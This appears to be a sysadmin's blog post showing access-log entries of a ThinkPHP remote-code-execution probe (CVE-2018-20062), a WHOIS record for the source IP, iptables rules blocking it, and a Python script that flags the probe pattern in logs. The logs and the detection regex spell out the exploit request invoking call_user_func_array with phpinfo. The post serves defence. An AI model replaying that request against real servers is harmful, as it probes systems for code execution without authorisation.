I have just seen in my logs an attempt to exploit the vulnerability CVE-2018-20062.
In the logs it looks like this:
121.5.155.158 - - [13/Oct/2021:07:16:18 +0200] "GET /TP/public/index.php HTTP/1.1" 302 403 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:19 +0200] "GET /user/auth/login HTTP/1.1" 200 8190 "http://80.15.48.50/TP/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:19 +0200] "GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 302 403 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:20 +0200] "GET /user/auth/login HTTP/1.1" 200 8187 "http://80.15.48.50/TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:20 +0200] "POST /TP/public/index.php?s=captcha HTTP/1.1" 302 215 "-" "Go-http-client/1.1"
121.5.155.158 - - [13/Oct/2021:07:16:21 +0200] "GET /user/auth/login HTTP/1.1" 200 8189 "http://80.15.48.50/TP/public/index.php?s=captcha" "Go-http-client/1.1"
121.5.155.158 - - [13/Oct/2021:07:16:22 +0200] "GET / HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:22 +0200] "GET /user/auth/login HTTP/1.1" 200 8190 "http://80.15.48.50:80" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
The IP address 121.5.155.158 is in China:
route: 121.4.0.0/15
origin: AS45090
descr: China Internet Network Information Center
Floor1, Building No.1 C/-Chinese Academy of Sciences
4, South 4th Street
Haidian District,
mnt-by: MAINT-CNNIC-AP
last-modified: 2020-02-25T01:14:09Z
source: APNIC
So the best thing to do is:
# iptables -A INPUT -s 121.5.155.158 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4
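Doing the same by hand for every probe gets old quickly, so here is a small added example (not from the original post) that parses Apache combined-format log lines, flags requests carrying the `\think\app/invokefunction` route seen above, and emits the same DROP rule per offending source. The signature regex, the parser and the benign sample line are assumptions of this example; the two attack lines are copied from the log above.

```python
import re
from collections import defaultdict

# Apache "combined" format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Route used by the CVE-2018-20062 probe in the post: s=index/\think\app/invokefunction.
# Apache escapes backslashes when writing the log, so accept one or more of them.
THINKPHP_RCE_RE = re.compile(r's=index/\\+think\\+app/invokefunction', re.IGNORECASE)


def parse_line(line):
    """Return the parsed fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_thinkphp_probes(lines):
    """Map each source IP to the request paths that matched the ThinkPHP RCE signature."""
    hits = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry and THINKPHP_RCE_RE.search(entry["path"]):
            hits[entry["ip"]].append(entry["path"])
    return dict(hits)


def iptables_drop_rules(ips):
    """One DROP rule per offending source, the same rule the post applies by hand."""
    return [f"iptables -A INPUT -s {ip} -j DROP" for ip in sorted(ips)]


SAMPLE_LOG = [
    # first two lines copied from the post's log; the third is a constructed benign request
    r'121.5.155.158 - - [13/Oct/2021:07:16:18 +0200] "GET /TP/public/index.php HTTP/1.1" 302 403 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"',
    r'121.5.155.158 - - [13/Oct/2021:07:16:19 +0200] "GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 302 403 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"',
    r'198.51.100.7 - - [13/Oct/2021:07:20:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for rule in iptables_drop_rules(find_thinkphp_probes(SAMPLE_LOG)):
        print(rule)
```

Feed it your real access log (one line per entry) and review the printed rules before applying and saving them as in the commands above.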
Next one …